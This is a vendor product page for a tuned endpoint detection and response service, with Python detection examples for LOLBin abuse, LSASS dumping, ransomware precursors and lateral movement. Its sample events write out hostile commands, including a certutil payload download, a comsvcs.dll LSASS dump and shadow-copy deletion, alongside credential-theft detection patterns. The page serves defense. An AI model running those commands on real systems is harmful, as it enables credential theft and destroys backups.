Endpoint Detection & Response
Endpoint detection and response, tuned to your environment by Ember.
Ember's endpoint detection and response is tuned to your specific environment, not generic out-of-the-box rules that generate noise. It is part of Agentic Security Operations, working across endpoint, cloud, and identity.
How It Works
Your Forward Deployed Engineer (FDE) works alongside Ember across your EDR platform to:
- Tune detection rules to your environment, reducing false positives
- Build custom detections for threats specific to your organization
- Author runbooks for every detection, so your team knows exactly how to respond
- Triage findings and add context before they reach your team
Supported EDR Platforms
| Platform | Full Support | Custom Detections | Managed Response |
|---|---|---|---|
| CrowdStrike Falcon | Yes | Yes | Yes |
| SentinelOne | Yes | Yes | Yes |
| Microsoft Defender for Endpoint | Yes | Yes | Partial |
| Carbon Black | Yes | Partial | Partial |
What Zaun Adds to Your EDR
Beyond Alert Triage
Most tools stop at alert triage. Ember goes further:
- Detection engineering: Custom rules built for your environment
- Runbook documentation: Every detection has a documented response procedure
- Continuous coverage: New detections ship as your environment and the threat landscape change
- Tuning and optimization: Ongoing reduction of false positives
Investigation Transparency
Every finding includes:
- Full evidence trail showing what was analyzed
- Detection logic explanation
- Recommended next steps from the runbook
- Historical context for similar findings
Specific Use Cases
Living-off-the-Land Binary (LOLBin) Abuse
An attacker uses legitimate Windows binaries like certutil.exe, mshta.exe, or regsvr32.exe to download and execute malicious payloads, bypassing application allowlists. Stock EDR rules generate noise on these common admin tools. Ember tunes CrowdStrike Falcon or SentinelOne detections to tell the difference between legitimate admin usage and attacker abuse based on your environment's baseline.
Credential Dumping via LSASS
An attacker attempts to dump credentials from the LSASS process using tools like Mimikatz, comsvcs.dll, or ProcDump. Zaun detects the LSASS access event in CrowdStrike or Microsoft Defender for Endpoint telemetry and correlates it with the parent process, command line arguments, and user context.
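The two use cases above come down to the same pattern: match the telemetry event, then apply an environment baseline before escalating. The Python below is an added example illustrating both the LOLBin and the LSASS detections; it is not Ember's or Zaun's code, and the event dict fields, the `Baseline` class, the `LOLBIN_INDICATORS` table and every sample event are assumptions constructed for illustration rather than real EDR telemetry.

```python
"""Baseline-aware detections for LOLBin abuse and LSASS access.

Added example, not Ember/Zaun code. Event dicts and field names are an
assumed, simplified shape of EDR process telemetry; the baseline values and
sample events are constructed for illustration.
"""
from dataclasses import dataclass, field


@dataclass
class Baseline:
    """Per-environment tuning: trusted admins, the parent images they work
    from (e.g. an RMM agent), and images allowed to read LSASS memory."""
    admin_users: set = field(default_factory=set)
    admin_parents: set = field(default_factory=set)
    lsass_readers: set = field(default_factory=set)


# Argument fragments that separate fetch/decode/execute use of each LOLBin
# from routine local use; keys are lowercase basenames (constructed table).
LOLBIN_INDICATORS = {
    "certutil.exe": ("-urlcache", "-decode", "-verifyctl"),
    "mshta.exe": ("http:", "https:", "javascript:", "vbscript:"),
    "regsvr32.exe": ("scrobj.dll", "/i:http"),
}
PROCESS_VM_READ = 0x0010          # access right needed to read LSASS memory
DUMP_HINTS = ("comsvcs", "minidump", "procdump", "sekurlsa")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def lolbin_finding(ev, baseline):
    """Process-execution event -> finding dict, or None if benign or tuned out."""
    image = basename(ev["image"])
    indicators = LOLBIN_INDICATORS.get(image)
    if not indicators:
        return None
    cmd = ev["cmdline"].lower()
    hits = [i for i in indicators if i in cmd]
    if not hits:
        return None                          # e.g. certutil -hashfile
    parent = basename(ev["parent_image"])
    # Known admins driving the tool from known admin tooling is the baseline;
    # the same arguments from an Office parent or a non-admin user are not.
    if ev["user"].lower() in baseline.admin_users and parent in baseline.admin_parents:
        return None
    return {"rule": "lolbin_abuse", "host": ev["host"], "user": ev["user"],
            "image": image, "parent": parent, "indicators": hits,
            "technique": "T1105" if image == "certutil.exe" else "T1218"}


def lsass_finding(ev, baseline):
    """Process-access event -> finding dict with parent, command line and
    user context, or None."""
    if basename(ev["target_image"]) != "lsass.exe":
        return None
    if not ev["access_mask"] & PROCESS_VM_READ:
        return None                          # handle opened without memory read
    source = basename(ev["source_image"])
    if source in baseline.lsass_readers:
        return None                          # EDR/AV sensors read LSASS legitimately
    cmd = ev["cmdline"].lower()
    return {"rule": "lsass_access", "host": ev["host"], "user": ev["user"],
            "source": source, "parent": basename(ev["parent_image"]),
            "cmdline": ev["cmdline"],
            "dump_hints": [h for h in DUMP_HINTS if h in cmd],
            "technique": "T1003.001"}


RULES = {"process_execution": lolbin_finding, "process_access": lsass_finding}


def run_detections(events, baseline):
    """Apply the rule matching each event's type; return the findings."""
    findings = []
    for ev in events:
        rule = RULES.get(ev["type"])
        finding = rule(ev, baseline) if rule else None
        if finding:
            findings.append(finding)
    return findings


# Constructed baseline and sample events (not real telemetry).
BASELINE = Baseline(admin_users={"corp\\svc_admin"},
                    admin_parents={"rmmagent.exe"},
                    lsass_readers={"msmpeng.exe", "csfalconservice.exe"})
SAMPLE_EVENTS = [
    {"type": "process_execution", "host": "ws01", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.exe"},
    {"type": "process_execution", "host": "ws02", "user": "CORP\\svc_admin",
     "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Program Files\RMM\rmmagent.exe",
     "cmdline": "certutil.exe -urlcache -f https://updates.example/cert.crt cert.crt"},
    {"type": "process_execution", "host": "ws03", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil -hashfile installer.msi SHA256"},
    {"type": "process_access", "host": "ws01", "user": "NT AUTHORITY\\SYSTEM",
     "source_image": r"C:\ProgramData\Microsoft\Windows Defender\MsMpEng.exe",
     "parent_image": r"C:\Windows\System32\services.exe", "cmdline": "MsMpEng.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "access_mask": 0x1410},
    {"type": "process_access", "host": "ws01", "user": "CORP\\jdoe",
     "source_image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "rundll32.exe comsvcs.dll, MiniDump 624 C:\\Temp\\l.dmp full",
     "target_image": r"C:\Windows\System32\lsass.exe", "access_mask": 0x1410},
]

if __name__ == "__main__":
    for f in run_detections(SAMPLE_EVENTS, BASELINE):
        print(f)
```

Of the five sample events only two produce findings: the first certutil run (download arguments from an Office parent by a non-admin) and the rundll32 handle on LSASS. The admin's certutil run from the RMM agent, the hash check, and Defender's own LSASS read are tuned out by the baseline rather than by weakening the rule.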
Ransomware Precursor Activity
Before deploying ransomware, attackers typically disable security tools, delete shadow copies, and stage data for exfiltration. Zaun builds multi-stage detections in SentinelOne or CrowdStrike that chain together:
- `vssadmin delete shadows` or `wmic shadowcopy delete`
- Service stop commands targeting backup and security services
- Rapid file enumeration across network shares
- Unusual use of archival tools like `7z.exe` or `rar.exe`
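Chaining stages is what separates this detection from four independent rules, each of which would be noisy on its own. The Python below is an added example of such a correlator, not Ember's or Zaun's code; the event shape, the 30-minute window, the share-enumeration threshold, the protected-service name fragments and the sample timeline are all constructed assumptions.

```python
"""Multi-stage ransomware precursor correlation.

Added example, not Ember/Zaun code. Event dicts are an assumed, simplified
shape of EDR telemetry; thresholds, service names and the sample timeline
are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)      # stages must cluster inside this span
MIN_STAGES = 3                      # distinct stages needed to raise a finding
SHARE_ENUM_THRESHOLD = 40           # distinct UNC paths touched inside WINDOW
# Fragments of service names whose stopping precedes encryption (constructed
# list; tune to the backup and security services actually deployed).
PROTECTED_SERVICES = ("windefend", "sense", "vss", "backup")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Map a single process-execution event to a precursor stage, or None."""
    if ev["type"] != "process_execution":
        return None
    cmd = ev["cmdline"].lower()
    parts = cmd.split()
    image = basename(ev["image"])
    if ("vssadmin" in cmd and "delete shadows" in cmd) or \
       ("wmic" in cmd and "shadowcopy delete" in cmd):
        return "shadow_copy_deletion"
    if image in ("net.exe", "net1.exe", "sc.exe") and "stop" in parts \
       and any(s in cmd for s in PROTECTED_SERVICES):
        return "service_stop"
    if image in ("7z.exe", "rar.exe") and len(parts) > 1 and parts[1] == "a":
        return "archival"                    # "a" = add files to an archive
    return None


def correlate(events):
    """Return one finding per host on which >= MIN_STAGES distinct stages
    occur within WINDOW of each other, with the evidence for each stage."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host[ev["host"]].append(ev)
    findings = []
    for host, evs in by_host.items():
        stages = []                          # (ts, stage, evidence), time-ordered
        share_hits = []                      # (ts, path) for the enumeration counter
        enum_fired = False
        for ev in evs:
            if ev["type"] == "file_access":
                if not ev["path"].startswith("\\\\"):
                    continue                 # local file activity is not share enumeration
                share_hits.append((ev["ts"], ev["path"]))
                recent = {p for t, p in share_hits if ev["ts"] - t <= WINDOW}
                if not enum_fired and len(recent) >= SHARE_ENUM_THRESHOLD:
                    enum_fired = True
                    stages.append((ev["ts"], "share_enumeration",
                                   f"{len(recent)} distinct share paths"))
                continue
            stage = classify(ev)
            if stage:
                stages.append((ev["ts"], stage, ev["cmdline"]))
        # Slide a WINDOW over the stage timeline; fire on the first dense cluster.
        for t0, _, _ in stages:
            cluster = [s for s in stages if t0 <= s[0] <= t0 + WINDOW]
            names = sorted({s[1] for s in cluster})
            if len(names) >= MIN_STAGES:
                findings.append({"host": host, "stages": names,
                                 "first_seen": t0, "last_seen": cluster[-1][0],
                                 "evidence": [s[2] for s in cluster]})
                break
    return findings


# Constructed sample timeline (not real telemetry).
T0 = datetime(2024, 1, 15, 10, 0)


def _proc(host, minute, image, cmdline):
    return {"type": "process_execution", "host": host,
            "ts": T0 + timedelta(minutes=minute), "image": image, "cmdline": cmdline}


SAMPLE_EVENTS = [
    _proc("srv-file01", 0, r"C:\Windows\System32\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    _proc("srv-file01", 3, r"C:\Windows\System32\net.exe", "net stop WinDefend"),
    _proc("srv-file01", 12, r"C:\Tools\7z.exe", r"7z.exe a staging.7z \\fs01\finance\q4"),
    # A developer box that merely archives a project and restarts the spooler.
    _proc("ws-dev07", 5, r"C:\Tools\7z.exe", "7z.exe a project.7z src"),
    _proc("ws-dev07", 6, r"C:\Windows\System32\net.exe", "net stop spooler"),
]
# 45 distinct finance share paths touched over five minutes on srv-file01.
SAMPLE_EVENTS += [{"type": "file_access", "host": "srv-file01",
                   "ts": T0 + timedelta(minutes=5, seconds=i * 6),
                   "path": rf"\\fs01\finance\q4\report_{i:03d}.xlsx"} for i in range(45)]

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f["host"], f["stages"], f["first_seen"], f["last_seen"])
```

Only `srv-file01` produces a finding: all four stages land inside twelve minutes. The developer workstation archives a project and stops the print spooler, which is one stage at most, so it stays quiet; the per-stage evidence list is what ends up in the finding's evidence trail.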
macOS Persistence via LaunchAgent
An attacker installs a LaunchAgent or LaunchDaemon plist on macOS endpoints to maintain persistence. Default EDR rules may not cover non-standard persistence paths. Ember writes custom detections for CrowdStrike Falcon that monitor plist creation in ~/Library/LaunchAgents/ and /Library/LaunchDaemons/ with exclusions for known-good software in your environment.
Lateral Movement via RDP and SMB
After initial compromise, an attacker moves laterally using Remote Desktop Protocol (RDP) or SMB with stolen credentials. Zaun detects unusual RDP login patterns, like a workstation-to-workstation RDP session or RDP from a non-admin user, by analyzing CrowdStrike or Defender authentication telemetry.
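The RDP patterns named above need an inventory (which hosts are workstations) and an expectation (which accounts open RDP sessions) before they can be evaluated. The Python below is an added example that applies both checks to logon events and adds a fan-out check across RDP and SMB sessions; it is not Ember's or Zaun's code, and the event shape, the `Environment` class, the 15-minute fan-out window and threshold, and the sample sessions are constructed assumptions.

```python
"""Lateral-movement detection over authentication telemetry.

Added example, not Ember/Zaun code. Logon events are an assumed, simplified
shape of Windows authentication telemetry; host roles, the admin set and
the sample sessions are constructed for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

LOGON_REMOTE_INTERACTIVE = 10   # Windows logon type for RDP sessions
LOGON_NETWORK = 3               # Windows logon type for SMB / admin-share access
FANOUT_WINDOW = timedelta(minutes=15)
FANOUT_THRESHOLD = 5            # distinct destinations from one source in the window


@dataclass
class Environment:
    host_roles: dict            # hostname -> "workstation" | "server" | "jump"
    rdp_admins: set             # lowercase accounts expected to open RDP sessions


def rdp_reasons(ev, env):
    """Reasons a single RDP logon deviates from the expected pattern."""
    if ev["logon_type"] != LOGON_REMOTE_INTERACTIVE:
        return []
    reasons = []
    src = env.host_roles.get(ev["src_host"], "unknown")
    dst = env.host_roles.get(ev["dst_host"], "unknown")
    if src == "workstation" and dst == "workstation":
        reasons.append("workstation_to_workstation")   # users rarely RDP peer to peer
    if ev["user"].lower() not in env.rdp_admins:
        reasons.append("non_admin_user")
    if src == "unknown":
        reasons.append("source_not_in_inventory")
    return reasons


def analyze(events, env):
    """Per-event RDP checks plus a fan-out check: one source reaching
    FANOUT_THRESHOLD distinct hosts over RDP or SMB inside FANOUT_WINDOW."""
    findings = []
    seen = defaultdict(list)                 # src_host -> [(ts, dst_host)]
    fanout_fired = set()
    for ev in sorted(events, key=lambda e: e["ts"]):
        reasons = rdp_reasons(ev, env)
        if reasons:
            findings.append({"rule": "rdp_anomaly", "user": ev["user"],
                             "src": ev["src_host"], "dst": ev["dst_host"],
                             "reasons": reasons, "technique": "T1021.001"})
        if ev["logon_type"] in (LOGON_REMOTE_INTERACTIVE, LOGON_NETWORK):
            src = ev["src_host"]
            seen[src].append((ev["ts"], ev["dst_host"]))
            recent = {d for t, d in seen[src] if ev["ts"] - t <= FANOUT_WINDOW}
            if src not in fanout_fired and len(recent) >= FANOUT_THRESHOLD:
                fanout_fired.add(src)        # one finding per source, not per session
                findings.append({"rule": "lateral_fanout", "user": ev["user"], "src": src,
                                 "destinations": sorted(recent), "technique": "T1021.002"})
    return findings


T0 = datetime(2024, 1, 15, 9, 0)


def _logon(minute, src, dst, user, logon_type):
    return {"ts": T0 + timedelta(minutes=minute), "src_host": src, "dst_host": dst,
            "user": user, "logon_type": logon_type}


# Constructed environment and sessions (not real telemetry).
ENV = Environment(
    host_roles={"jump01": "jump", "ws-fin03": "workstation", "ws-hr12": "workstation",
                **{f"srv-app{i:02d}": "server" for i in range(1, 7)}},
    rdp_admins={"corp\\adm_kim"})
SAMPLE_EVENTS = [
    _logon(0, "jump01", "srv-app01", "CORP\\adm_kim", LOGON_REMOTE_INTERACTIVE),  # expected
    _logon(5, "ws-fin03", "ws-hr12", "CORP\\ppatel", LOGON_REMOTE_INTERACTIVE),   # two deviations
] + [_logon(10 + i, "ws-fin03", f"srv-app{i:02d}", "CORP\\ppatel", LOGON_NETWORK)
     for i in range(1, 7)]                                                       # SMB fan-out

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS, ENV):
        print(f)
```

The admin's session from the jump host raises nothing. The finance workstation reaching an HR workstation under a non-admin account raises one finding with both reasons, and the same source then touching a fifth distinct host over SMB raises the fan-out finding once, rather than once per session.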
Supply Chain Binary Execution
A compromised update for a legitimate tool (e.g., a signed binary from a trusted vendor) executes unexpected child processes or makes network connections to command-and-control infrastructure. Zaun builds detections that baseline expected process trees for your installed software and flag deviations.
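Baselining a process tree means learning it from the fleet first, and deciding how much of the fleet must agree before a behaviour counts as expected. The Python below is an added example of that learn-then-check loop for one trusted binary; it is not Ember's or Zaun's code, and the event shape, the `ProcessBaseline` class, the `min_hosts` rule, the vendor updater path, the hosts and the destinations are all constructed assumptions.

```python
"""Process-tree and network baselining for trusted vendor binaries.

Added example, not Ember/Zaun code. Events are an assumed, simplified shape
of EDR telemetry; the vendor binary, hosts and destinations are constructed.
"""
from collections import defaultdict


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


class ProcessBaseline:
    """Learns, per monitored binary, which children it spawns and which
    destinations it talks to across the fleet. Behaviour seen on fewer than
    min_hosts hosts during learning is treated as noise, not baseline."""

    def __init__(self, monitored, min_hosts=3):
        self.monitored = {m.lower() for m in monitored}
        self.min_hosts = min_hosts
        self._children = defaultdict(lambda: defaultdict(set))  # image -> child -> hosts
        self._dests = defaultdict(lambda: defaultdict(set))     # image -> dest -> hosts

    def learn(self, ev):
        if ev["type"] == "process_execution":
            parent = basename(ev["parent_image"])
            if parent in self.monitored:
                self._children[parent][basename(ev["image"])].add(ev["host"])
        elif ev["type"] == "network_connection":
            image = basename(ev["image"])
            if image in self.monitored:
                self._dests[image][ev["dest"].lower()].add(ev["host"])

    def expected_children(self, image):
        return {c for c, hosts in self._children[image].items() if len(hosts) >= self.min_hosts}

    def expected_dests(self, image):
        return {d for d, hosts in self._dests[image].items() if len(hosts) >= self.min_hosts}

    def check(self, ev):
        """Return a finding for a deviation from the learned tree, else None."""
        if ev["type"] == "process_execution":
            parent = basename(ev["parent_image"])
            child = basename(ev["image"])
            if parent in self.monitored and child not in self.expected_children(parent):
                return {"rule": "unexpected_child", "host": ev["host"], "image": parent,
                        "observed": child, "expected": sorted(self.expected_children(parent))}
        elif ev["type"] == "network_connection":
            image = basename(ev["image"])
            dest = ev["dest"].lower()
            if image in self.monitored and dest not in self.expected_dests(image):
                return {"rule": "unexpected_destination", "host": ev["host"], "image": image,
                        "observed": dest, "expected": sorted(self.expected_dests(image))}
        return None


UPDATER = r"C:\Program Files\VendorTool\vtupdater.exe"   # constructed vendor binary


def _spawn(host, child):
    return {"type": "process_execution", "host": host, "parent_image": UPDATER, "image": child}


def _conn(host, dest):
    return {"type": "network_connection", "host": host, "image": UPDATER, "dest": dest}


# Learning period: the updater runs msiexec and fetches from the vendor CDN on
# ten hosts; one host shows a cmd.exe child that never becomes baseline.
LEARNING_EVENTS = [_spawn(f"ws{i:02d}", r"C:\Windows\System32\msiexec.exe") for i in range(10)] \
    + [_conn(f"ws{i:02d}", "updates.vendortool.example:443") for i in range(10)] \
    + [_spawn("ws04", r"C:\Windows\System32\cmd.exe")]
# Detection period: a later "update" behaves differently on ws07.
DETECTION_EVENTS = [
    _spawn("ws07", r"C:\Windows\System32\msiexec.exe"),                              # baseline
    _conn("ws07", "updates.vendortool.example:443"),                                  # baseline
    _spawn("ws07", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),     # deviation
    _conn("ws07", "203.0.113.5:443"),                                                 # deviation
]


def build_and_check(learning=LEARNING_EVENTS, detection=DETECTION_EVENTS):
    baseline = ProcessBaseline(monitored=[basename(UPDATER)])
    for ev in learning:
        baseline.learn(ev)
    return [f for f in map(baseline.check, detection) if f]


if __name__ == "__main__":
    for f in build_and_check():
        print(f)
```

The `min_hosts` threshold is the tuning knob: the single-host `cmd.exe` child seen during learning is excluded from the baseline, so the same child during detection would still be flagged, while `msiexec.exe` and the vendor CDN, observed fleet-wide, are not. Each finding carries the expected set so the analyst can see what the baseline was when the deviation fired.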
Linux Container Escape
An attacker breaks out of a Docker container on a production Linux host by exploiting a kernel vulnerability or misconfigured capabilities. Zaun monitors CrowdStrike Falcon for Linux or SentinelOne for container escape indicators like nsenter usage, chroot calls, or unexpected mount operations from container processes.
Integrations
| Integration | Signal Type | What It Provides |
|---|---|---|
| CrowdStrike Falcon | Endpoint telemetry | Process execution, file writes, network connections, DNS |
| SentinelOne Singularity | Endpoint telemetry | Storyline-based process trees, threat indicators |
| Microsoft Defender for Endpoint | Endpoint telemetry | Process events, network connections, file activity |
| Carbon Black Cloud | Endpoint telemetry | Process execution, binary analysis, network |
| CrowdStrike Falcon Identity | Identity signals | Lateral movement, credential theft, AD changes |
| Slack | Alert delivery | Finding notifications, runbook links, escalation |
| PagerDuty | Incident mgmt | On-call routing, incident creation, escalation |
| Jira | Ticketing | Finding tracking, investigation documentation |
| MITRE ATT&CK | Framework | Detection mapping to techniques and sub-techniques |
Configuration
```yaml
# Example: EDR monitoring policy
edr:
  platform: crowdstrike
  monitoring:
    - process_execution
    - file_modifications
    - network_connections
    - registry_changes
  custom_detections:
    enabled: true
    auto_deploy: false  # Require review before deployment
  alerting:
    severity_threshold: medium
    channels:
      - slack: "#security-alerts"
      - pagerduty: security-oncall
```
Next Steps
- Cloud Security - Detect risky changes across cloud and SaaS
- Identity + OAuth - Monitor identity threats
- Integrations - Connect your EDR platform